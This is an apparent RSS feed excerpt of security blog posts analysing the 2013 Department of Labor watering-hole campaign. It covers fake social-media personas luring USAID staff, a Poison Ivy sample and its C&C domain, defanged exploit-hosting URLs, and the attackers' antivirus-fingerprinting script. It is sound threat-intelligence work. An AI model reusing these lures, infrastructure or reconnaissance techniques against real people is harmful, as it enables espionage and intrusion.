<blockquote><p>The Better Health Services (BHS) is a USAID-funded health systems strengthening project in Cambodia that began in January 2009 and runs through December 2013. The BHS project’s goals dovetail with the mission of the Ministry of Health as stated in the Cambodian Health Strategic Plan 2008-2015 (HSP2) “to provide stewardship for the entire health sector and to ensure a supportive environment for increased demand and equitable access to quality health services in order that all the peoples of Cambodia are able to achieve the highest level of health and well-being.”</p></blockquote>
<p>By continuing my researches on the gathered information&#8217;s found on dol[.]ns01[.]us backend and focusing on all information&#8217;s related to University Research Co. Cambodia website, I found some interesting behaviours.</p>
<p>In all the gathered information&#8217;s I firstly found a connection referer to www[.]urccambodia[.]org, this referer was a shortened URL http://t[.]co/RnWc0Z13Sc. Doing a google research on this shortened URL we can find a tweet from <strong><a href="https://twitter.com/natividad_usaid" target="_blank">@natividad_usaid</a></strong>, dating from 2013-03-18.</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-1.png"><img class="aligncenter size-full wp-image-6528" alt="natividad_usaid-1" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-1.png?resize=294%2C165" data-recalc-dims="1" /></a></p>
<p>If you observe @natividad_usaid, you will see that the account activity has begun the March 18th and finished the April 10th. Mostly all of the tweet have provide link to www[.]urccambodia[.]org, during the time of this website infection. Some twitter users were directly contacted in order to incite them to click to the link and most of these users were related to <strong>USAID </strong>(US Agency for International Development).</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-2.png"><img class="aligncenter size-full wp-image-6530" alt="natividad_usaid-2" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-2.png?resize=532%2C117" data-recalc-dims="1" /></a></p>
<p>&nbsp;</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-5.png"><img class="aligncenter size-full wp-image-6545" alt="natividad_usaid-5" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-5.png?resize=531%2C121" data-recalc-dims="1" /></a></p>
<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-4.png"><img class="aligncenter size-full wp-image-6532" alt="natividad_usaid-4" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-4.png?resize=538%2C77" data-recalc-dims="1" /></a></p>
<p>But most interesting is the profile description of this account and especially the shortened URL goo[.]gl/kpb7r how lead to &#8220;<em>this is my pic.scr</em>&#8221; file hosted on <strong>Dropbox</strong>. By analyzing this file it appear that it is <strong>Poison Ivy</strong> (<a href="https://www.virustotal.com/fr/file/e08325cf45f1199600eab8c65cd54bc52578c8f67c1b331ca80fd28659922cc4/analysis/" target="_blank">504a32e123194a298018129404a1374e</a>).</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-profile.png"><img class="aligncenter size-full wp-image-6533" alt="natividad_usaid-profile" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/natividad_usaid-profile.png?resize=529%2C322" data-recalc-dims="1" /></a></p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/dropbox-poisonivy.png"><img class="aligncenter size-full wp-image-6534" alt="dropbox-poisonivy" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/dropbox-poisonivy.png?resize=379%2C310" data-recalc-dims="1" /></a></p>
<p>A <a href="https://malwr.com/analysis/YTZiZDA4MThlYWI0NDRiMDg1OWUzNDFmY2I2ODNmZjE/" target="_blank"><strong>malwr</strong></a> analysis of this sample reveal that &#8220;microsoftUpdate[.]ns1[.]name&#8221; is the contacted C&amp;C server and that &#8220;<em>conime.exe</em>&#8221; file is also created. This C&amp;C server is the same as mentioned by <a href="http://www.crowdstrike.com/blog/department-labor-strategic-web-compromise/index.html" target="_blank"><strong>Crowdstrike</strong></a>, <strong><a href="http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/" target="_blank">AlienVault</a> </strong>and other security researchers or vendors, but from &#8220;<em>bookmark.png</em>&#8221; payload involved in Internet Explorer 8 0day (CVE-2013-1347).</p>
<p>It seem that this twitter account was only created and used to incite USAID twitter users to be infected through a www[.]urccambodia[.]org visit.</p>
<p>By continuing to analyze www[.]urccambodia[.]org related gathered information&#8217;s, I found a second connection referer to www[.]urccambodia[.]org. This referer is the Facebook profile of Kelly Black &#8220;<em>http://www.facebook.com/kelly.black.92754</em>&#8220;.</p>
<p>This sexy lady, posing with a friend, pretend to have work for USAID, to have study at UVA College of Arts &amp; Sciences Alumni, to live in Washington, District of Columbia and to be from Springfield, Illinois.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-1.png"><img class="aligncenter size-full wp-image-6537" alt="kelly-black-facebook-1" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-1.png?resize=430%2C547" data-recalc-dims="1" /></a></p>
<p>Kelly Black account activity has start and stopped the same day, the March 24th. Most of the posts of this &#8220;lady&#8221; are link to infected www[.]urccambodia[.]org website and/or to project around sanitation of Mekong waters organized by US organization&#8217;s.</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-2.png"><img class="aligncenter size-full wp-image-6538" alt="kelly-black-facebook-2" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-2.png?resize=526%2C188" data-recalc-dims="1" /></a></p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-3.png"><img class="aligncenter size-full wp-image-6539" alt="kelly-black-facebook-3" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-3.png?resize=525%2C279" data-recalc-dims="1" /></a></p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-4.png"><img class="aligncenter size-full wp-image-6540" alt="kelly-black-facebook-4" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-4.png?resize=523%2C422" data-recalc-dims="1" /></a></p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-5.png"><img class="aligncenter size-full wp-image-6541" alt="kelly-black-facebook-5" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-5.png?resize=520%2C298" data-recalc-dims="1" /></a><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-5.png"><img class="aligncenter size-full wp-image-6541" alt="kelly-black-facebook-5" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-5.png?resize=520%2C298" data-recalc-dims="1" /></a></p>
<p>This sexy lady has, in one day of activity, 41 friends and most of these friends are from USAID or from others organization&#8217;s.</p>
<p>Now the funny part of the story, on the picture you can see two beautiful women with a yellow T-shirt and they seem to enjoy the live. One of the friends of Kelly Black was interesting to know which of the two she was, and the &#8220;bad guys&#8221; toke the time to respond to him <img src='http://i1.wp.com/eromang.zataz.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' data-recalc-dims="1" /> </p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-6.png"><img class="aligncenter size-full wp-image-6542" alt="kelly-black-facebook-6" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/kelly-black-facebook-6.png?resize=521%2C143" data-recalc-dims="1" /></a></p>
<p>But I was intrigued by this picture and decided to compare this one on Internet, and ho miracle these ladies are not US women from Springfield, Illinois, but Swedish supporters who were photographed during European soccer cup in Poland/Ukraine.</p>
<p>You can find this photo through <a href="http://www.tineye.com/" target="_blank"><strong>TinEye</strong></a> or <a href="http://images.google.com/" target="_blank"><strong>Google</strong></a> pictures comparison services. This photo is present on different medias, <a href="http://actionplusps.photoshelter.com/image/I0000zMjusiEWWe8" target="_blank"><strong>ActionPlus</strong></a>, <strong><a href="http://www.dailymail.co.uk/news/article-2162181/Ukrainian-Swedish-women-named-worlds-best-looking.html" target="_blank">DailyMail</a> </strong>and bunch of <a href="https://www.google.com/search?tbs=sbi:AMhZZiv3BqqJ8lCqtA5wbZAFmBZqyxZ67B9M1-wNGrIRhH6FITYDT6SeOQJe83S-Kh6UxOFjTkQQgh6XmXKA_1hAcUUTgwJYHovIiAeroVOTmrAUm1QIcScZkZiXb5WYBfM-nqTybcWMsKFK-LMk6OcecwHITPd5AZhizP0hE_1ovlQR31hOnsT4eMF7MfeTXe4VlsyQST3XY7AHuFMeEBB-7C3EgJlHLu7irr7BfFyOiTOC4-ksbt4usHJoySrOkAB8Gc_1z2ygcqBHRWcrU4rAO_16vQSbt8RdHyHHFmuJYs2PXsT8VmjXYroEi_1zUwvGihrPQ70XSn2wtZSLqon0I1edIiZgntV-iqu82BFea0DR4DGM9CqhtMSOVGoVJXQb3PXCW1kb-ZqVWhGsBGAYB2eOE9Te6xW7Ya-Eq8hlmlZp8M6xmz_1BmNQmPDzRFGYoUhZWMW1mtzlf3_15wYDYzZrGY9Z87XwudCiBooWh8_13Go3vVBZ4sOwGaJkGc9fil6QzeerTmwAyH9Z3jj-dqyNNJB_16CJU5jDHlVfqdlMB2su5YAnJ2Y6e7wS5cqKWBirwpR6Fay4oM6a8juiNL5EONxX5-fIU-2NZU2YVsyKjh2X2qyLct5Bg-Xw5dlVsEQv5hpzezPSDHRRLkxwgXZ1CBGkh-eD3YwP2nZiXcN29RyTLck7kHl-wJEtheiyyEdPGI-6ZYPhe-OveA12zB4p8_1m0YHfYbdMZVL3EH3jJ9FFY0-AI1LRIOui1Uhsrempxo9Qd4fM4v7hSA_14UPZgnaHsixdT7tctYfQ8TdmG6GSIW-xNH9ZD09U_1hG5TFIvo3N4GGefXFa_1u_1pfCBRXs6Ey1WTq0Q9pBBsc0VxRZ3YjFQ5bz-aVSI9b1iSFHKyp67Un5DHmmDvivR9aTfSDwZ0EhDmYEB82DSANs-_1lmF4Sa4ymu_1PGAzAaJQWF-IVfE7DRPbIBhm2N9Fs_18ex8sRi49OClPDRUi-BrdoqCDV_1Rgh4o91UY6lpuzPcqK_1WlcHvaN2WkDIXcZCAA8O6ZbIO2o1z_1P3gv-NkpDCc1jLuOr9HFEApmcRJMY61BAKfzYuowWExaak_16eek7pY5arz62RmCzDGkW6RI-2CC3VyeRJn7fXc3XbOWO_1LNEyWj5tU9up_13pWV14KPgC6Ltuy2_1ermwSKgaTbZBa8jYZETiB6iFv2v1CgvVKKvvgPCccHOEND9Zcq46e1BzMGyvDfcPeciee5SYzY1ly0LNz_1Q0_1dSY4Lpee0vOB_1Ci_1_1k3TpuMoHUY8hvp97L_1FagSDA9FatTQUgeiRPGMUEuHGbvTyWpgQwy3hiMr7Jg&amp;safe=off&amp;bih=739&amp;biw=1387" target="_blank"><strong>other websites</strong></a>.</p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6489" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/" class="wp_rp_title">Department of Labor Watering Hole Campaign Review</a></li><li data-position="1" data-poid="in-6487" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo</a></li><li data-position="2" data-poid="in-5985" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/06/forgotten-watering-hole-attacks-on-space-foundation-and-rsf-chinese/" class="wp_rp_title">Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese</a></li><li data-position="3" data-poid="in-5960" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/" class="wp_rp_title">Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More</a></li><li data-position="4" data-poid="in-6082" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/15/watering-hole-campaign-use-latest-java-and-ie-vulnerabilities/" class="wp_rp_title">Watering Hole Campaign Use Latest Java and IE Vulnerabilities</a></li><li data-position="5" data-poid="in-5953" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" class="wp_rp_title">Microsoft Internet Explorer CButton Vulnerability Metasploit Demo</a></li><li data-position="6" data-poid="in-5915" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" class="wp_rp_title">Attack and IE 0day Informations Used Against Council on Foreign Relations</a></li><li data-position="7" data-poid="in-5941" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/30/microsoft-release-security-advisory-msa-2794220-for-cfe-internet-explorer-0day/" class="wp_rp_title">Microsoft Release Security Advisory MSA-2794220 for CFE Internet Explorer 0day</a></li><li data-position="8" data-poid="in-6070" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/14/microsoft-out-of-band-patch-for-internet-explorer-cve-2012-4792-vulnerability/" class="wp_rp_title">Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability</a></li><li data-position="9" data-poid="in-5974" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/03/chinese-uygur-minority-also-targeted-in-the-cfr-watering-hole-attack-and-more/" class="wp_rp_title">Chinese Uygur Minority Also Targeted in the CFR Watering Hole Attack And More</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/05/12/dol-watering-hole-campaign-and-sexy-swedish-soccer-supporter/feed/</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>Department of Labor Watering Hole Campaign Review</title>
		<link>http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/</link>
		<comments>http://eromang.zataz.com/2013/05/10/department-of-labor-watering-hole-campaign-review/#comments</comments>
		<pubDate>Fri, 10 May 2013 14:07:24 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[APSA13-03]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[CFR]]></category>
		<category><![CDATA[CVE-2012-4792]]></category>
		<category><![CDATA[CVE-2013-1347]]></category>
		<category><![CDATA[CVE-2013-3336]]></category>
		<category><![CDATA[Department of Labor]]></category>
		<category><![CDATA[DOL]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Internet Explorer 0day]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[MSA-2847140]]></category>
		<category><![CDATA[watering hole attacks]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6489</guid>
		<description><![CDATA[On April 30th, the watering hole campaign was published on a private mailing list and the May 1st, Invicia and AlienVault publicly reported, with technical details, that United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code.  [...]]]></description>
				<content:encoded><![CDATA[<p>On April 30th, the watering hole campaign was published on a private mailing list and the May 1st, <a href="http://www.invincea.com/2013/05/part-2-us-dept-labor-watering-hole-pushing-poison-ivy-via-ie8-zero-day/" target="_blank"><strong>Invicia</strong></a> and <a href="http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/" target="_blank"><strong>AlienVault</strong></a> publicly reported, with technical details, that <strong>United States Department of Labor (DOL) Site Exposure Matrices (SEM)</strong> website had been compromised and was hosting malicious code. This malicious code was used in watering hole attack targeting at first employees of US Dept of Energy that work in nuclear weapons programs. This malicious code was also used to gather information&#8217;s on the visitors of the compromised website.</p>
<p>The exploit used in this campaign was firstly reported as <strong><a title="Microsoft Internet Explorer CButton Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" target="_blank">CVE-2012-4792</a></strong>, an Internet Explorer 0day used in December 2012 in <a title="Attack and IE 0day Informations Used Against Council on Foreign Relations" href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" target="_blank">CFR.org watering hole campaign</a> and <a title="Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability" href="http://eromang.zataz.com/2013/01/14/microsoft-out-of-band-patch-for-internet-explorer-cve-2012-4792-vulnerability/" target="_blank">patched by Microsoft in January 2013</a>. Despite the patch release some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online medias and human right activists.</p>
<p>Two days later, <a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/05/ie-zero-day-is-used-in-dol-watering-hole-attack.html" target="_blank"><strong>FireEye</strong></a>, <a href="http://www.invincea.com/2013/05/k-i-a-us-dol-website-pushing-poison-ivy-cve-2012-4792/" target="_blank"><strong>Invicia</strong></a> and <a href="http://labs.alienvault.com/labs/index.php/2013/new-internet-explorer-zeroday-was-used-in-the-dol-watering-hole-campaign/" target="_blank"><strong>AlienVault</strong></a> concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792 as they originally reported but a new Internet Explorer 8 vulnerability identified as <a title="CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2013/05/05/cve-2013-1347-microsoft-internet-explorer-8-vulnerability-metasploit-demo/" target="_blank"><strong>CVE-2013-1347</strong></a>. This turnaround had unfortunately occur to late. Casual attacker, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidences.</p>
<p>Microsoft has acknowledge the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as <strong><a href="http://technet.microsoft.com/en-us/security/advisory/2847140" target="_blank">MSA-2847140</a> </strong>and has provide a &#8220;<a href="http://blogs.technet.com/b/srd/archive/2013/05/08/microsoft-quot-fix-it-quot-available-to-mitigate-internet-explorer-8-vulnerability.aspx" target="_blank"><strong>Fix it</strong></a>&#8221; solution to mitigate Internet Explorer 8 vulnerability.</p>
<p>Also, Adobe has announce through <a href="http://www.adobe.com/support/security/advisories/apsa13-03.html" target="_blank"><strong>APSA13-03</strong></a> that a critical vulnerability (<strong>CVE-2013-3336</strong>) is actually exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server, through &#8220;<em>CFIDE/administrator</em>&#8220;, &#8220;<em>CFIDE/adminapi</em>&#8221; and &#8220;<em>CFIDE/gettingstarted*</em>&#8221; directories. Adobe ColdFusion is used by DOL and this vulnerability has surely be used in order to compromise the server.</p>
<h5>Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347</h5>
<p>Confusions with CVE-2012-4792 was possible due to similarities in used code and technics:</p>
<p><em><strong>Usage of widely used JavaScript functions and variables</strong></em></p>
<p>&#8220;<em>function getCookieVal(offset)</em>&#8220;, widely used, is also present in original CVE-2012-4792 exploit and other forks.<br />
&#8220;<em>function GetCookie(name)</em>&#8220;, widely used,  is also present in original CVE-2012-4792 exploit and other forks.<br />
&#8220;<em>function SetCookie(name,value)</em>&#8220;, widely used, is also present in original CVE-2012-4792 exploit and other forks.<br />
&#8220;<em>var ua = window.navigator.userAgent.toLowerCase()</em>&#8220;, widely used, is also present in original CVE-2012-4792 exploit and other forks.</p>
<p><em><strong>Usage of particular JavaScript functions also present in previous watering hole campaigns</strong></em></p>
<p>&#8220;<em>function DisplayInfo()</em>&#8221; also seen in CVE-2012-4792 &amp; <a title="CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability" href="http://eromang.zataz.com/2011/04/16/cve-2011-0611-adobe-flash-player-swf-memory-corruption-vulnerability/" target="_blank">CVE-2011-0611</a> exploits.<br />
&#8220;<em>function download()</em>&#8221; &amp; &#8220;<em>function callback()</em>&#8221; also seen in CVE-2012-4792 exploit.</p>
<p><em><strong>Usage of Ajax XMLHttpRequest</strong></em></p>
<p>This JavaScript object is used to download &#8220;<em>bookmark.png</em>&#8221; file and was also used to download  &#8221;<em>xsainfo.jpg</em>&#8221; file in CVE-2012-4792.</p>
<p><em><strong>Similarities in the JavaScript code structure</strong></em></p>
<p>If you compare the original CVE-2012-4792 JavaScript code and <strong>Exodus Intel</strong> fork, with this new exploit, the code structure is very similar in many aspects.</p>
<p><em><strong>Usage of HTML+TIME technic</strong></em></p>
<p>HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792. This technic was explained by <a href="http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/ " target="_blank"><strong>Exodus Intel</strong></a> beginning January 2013.</p>
<p><em><strong>Target selection</strong></em></p>
<p>Parts of the code targets only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.</p>
<h5>Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities</h5>
<p>Some new particularities were present in the exploit and associated watering hole campaign:</p>
<p><em><strong>Usage of PHP files</strong></em></p>
<p>All previous watering hole attacks have use HTML or JavaScript files. PHP usage naturally limit the number of potential servers who could be used to start the exploitation and spread the malware. This approach increasingly the technic used by Exploit Kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.</p>
<p><em><strong>Usage of Base64 obfuscation</strong></em></p>
<p>Obfuscation with base64 encoding (&#8220;<em>base64.js</em>&#8221; file) was used to hide parts of the exploit. CVE-2012-4792 was using &#8220;<em>robots.txt</em>&#8221; obfuscated with substitutions and HEX encoding.</p>
<p><em><strong>Use-After-Free type</strong></em></p>
<p>As mentioned by <a href="https://community.rapid7.com/community/metasploit/blog" target="_blank"><strong>sinn3r</strong></a> of Metasploit team, CVE-2012-4792 was a CButton object use-after-free and CVE-2013-1347 is a CGenericElement object use-after-free.</p>
<h5>dol[.]ns01[.]us Exploit Hosting Domain Evolutions</h5>
<p><strong>Invicia</strong> and <strong>AlienVault </strong>have report that the browser was redirected to the content hosted at dol[.]ns01[.]us which lead to the infection. A <strong>urlQuery</strong>, of <a href="http://urlquery.net/report.php?id=2259188" target="_blank"><strong>2013-05-01</strong></a>,<strong> </strong>is mentioned and refer to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script is mentioning a last modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URL&#8217;s are present in the code.</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/96.44.136.115-3.gif"><img class="aligncenter size-full wp-image-6491" alt="96.44.136.115-3" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/96.44.136.115-3.gif?resize=424%2C189" data-recalc-dims="1" /></a></p>
<p>But if you take a look to a previous urlQuery report of <strong><a href="http://urlquery.net/report.php?id=2223322" target="_blank">2013-04-29</a></strong>, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and coded in the executed JavaScript. 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see no specific destination port is present and the last modified date is the same. So we can conclude that the guys behind this campaign have change the malicious code during this interval.</p>
<p style="text-align: center;"><a style="color: #ed1e24; text-decoration: underline; text-align: start;" href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/urlquery-dol-1.gif"><img class="aligncenter size-full wp-image-6494" alt="urlquery-dol-1" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/urlquery-dol-1.gif?resize=424%2C189" data-recalc-dims="1" /></a></p>
<p>You can observe this evolution with the urlQuery submission of <strong><a href="http://urlquery.net/report.php?id=2232889" target="_blank">2013-04-30</a></strong>.</p>
<p><a style="color: #ed1e24; text-decoration: underline; text-align: center;" href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/urlquery-2.gif"><img class="aligncenter  wp-image-6492" alt="urlquery-2" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/urlquery-2.gif?resize=691%2C194" data-recalc-dims="1" /></a></p>
<p>All these urlQuery submission&#8217;s were done with a non Internet Explorer 8 user agent, and as the exploit malicious code was designed to only target Windows XP and Internet Explorer 8, part of the redirection were not present as evidences.</p>
<p>If you observe &#8220;<a href="http://pastebin.com/7yYd6Dzt" target="_blank"><em>/scripts/textsize.js</em></a>&#8221; JavaScript code hosted on DOL website, you can see a first JavaScript inclusion to &#8220;<em>hxxp://dol[.]ns01[.]us:8081/web/xss.php</em>&#8221; and a second one to &#8220;<em>hxxp://dol[.]ns01[.]us:8081/update/index.php</em>&#8220;.</p>
<p>The first inclusion &#8220;<a href="http://pastebin.com/nk74nzRJ" target="_blank"><em>/web/xss.php</em></a>&#8221; was used in order to gather information&#8217;s on the DOL website visitors and the second inclusion &#8220;<a href="http://pastebin.com/vkQAgnUV" target="_blank"><em>/update/index.php</em></a>&#8221; was used to start the exploitation of CVE-2013-1347.</p>
<h5>Information Gathering Scripts</h5>
<p>As described by <a href="http://labs.alienvault.com/labs/index.php/2013/u-s-department-of-labor-website-hacked-and-redirecting-to-malicious-code/" target="_blank"><strong>AlienVault</strong></a>, the information gathering code &#8220;<em>/web/xss.php</em>&#8221; on <em>dol[.]ns01[.]us </em>use different JavaScript functions to collect information&#8217;s from the system and upload the result to the malicious server.</p>
<p>I found that the information&#8217;s gathering script was different depending on the used browser. Here under a description of the JavaScript functions involved in information&#8217;s gathering depending on used browsers.</p>
<h2 class="tablepress-table-name tablepress-table-name-id-22">DOL Information Gathering Functions</h2>

<table id="tablepress-22" class="tablepress tablepress-id-22">
<thead>
<tr class="row-1 odd">
	<th class="column-1"><div>JavaScript Function(s)</div></th><th class="column-2"><div>Targeted Browser(s)</div></th><th class="column-3"><div>Function Description</div></th>
</tr>
</thead>
<tbody class="row-hover">
<tr class="row-2 even">
	<td class="column-1">jstocreate()</td><td class="column-2">Internet Explorer</td><td class="column-3">Test the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012, Kaspersky 2013 anti-viruses.</td>
</tr>
<tr class="row-3 odd">
	<td class="column-1">flashver()</td><td class="column-2">Internet Explorer &amp; Firefox &amp; Chrome</td><td class="column-3">Test the presence and version of Adobe Flash, and supported OS.</td>
</tr>
<tr class="row-4 even">
	<td class="column-1">officever()</td><td class="column-2">Internet Explorer</td><td class="column-3">Test the presence and version of Microsoft Office</td>
</tr>
<tr class="row-5 odd">
	<td class="column-1">plugin_pdf_ie()</td><td class="column-2">Internet Explorer</td><td class="column-3">Test the presence of Adobe Reader</td>
</tr>
<tr class="row-6 even">
	<td class="column-1">bitdefender2012check()</td><td class="column-2">Internet Explorer &amp; Firefox &amp; Chrome</td><td class="column-3">Test the presence of BitDefender 2012 and try to disable it through disabledbitdefender_2012() function.</td>
</tr>
<tr class="row-7 odd">
	<td class="column-1">java()</td><td class="column-2">Internet Explorer &amp; Firefox &amp; Chrome</td><td class="column-3">Test the presence and version of Oracle Java plug-in</td>
</tr>
<tr class="row-8 even">
	<td class="column-1">xunleicheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of xThunder Chrome extension, an extension managing popular downloaders.</td>
</tr>
<tr class="row-9 odd">
	<td class="column-1">kavcheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Kaspersky Chrome extension</td>
</tr>
<tr class="row-10 even">
	<td class="column-1">fiddlercheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application</td>
</tr>
<tr class="row-11 odd">
	<td class="column-1">liveheadercheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Live HTTP Header Chrome extension</td>
</tr>
<tr class="row-12 even">
	<td class="column-1">webdevelopercheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Web Developer Chrome extension</td>
</tr>
<tr class="row-13 odd">
	<td class="column-1">avg2012check()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of AVG 2012 Chrome extension</td>
</tr>
<tr class="row-14 even">
	<td class="column-1">tamperdatacheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Tamper data Chrome extension</td>
</tr>
<tr class="row-15 odd">
	<td class="column-1">adblockcheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Adblocker Chrome extension</td>
</tr>
<tr class="row-16 even">
	<td class="column-1">avastcheck()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of Avast! Chrome extention</td>
</tr>
<tr class="row-17 odd">
	<td class="column-1">pluginverother()</td><td class="column-2">Firefox &amp; Chrome</td><td class="column-3">Test the presence of all installed modules</td>
</tr>
</tbody>
</table>
<span class="tablepress-table-description tablepress-table-description-id-22">All functions used by the information gathering script involved in the DOL watering hole campaign.</span>
<!-- #tablepress-22 from cache -->
<p>Also a specific information gathering technic was triggered when Internet Explorer was used. This technic is related to a <a href="http://www.nsfocus.com/en/2012/advisories_1228/119.html" target="_blank">non patched vulnerability</a> in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.</p>
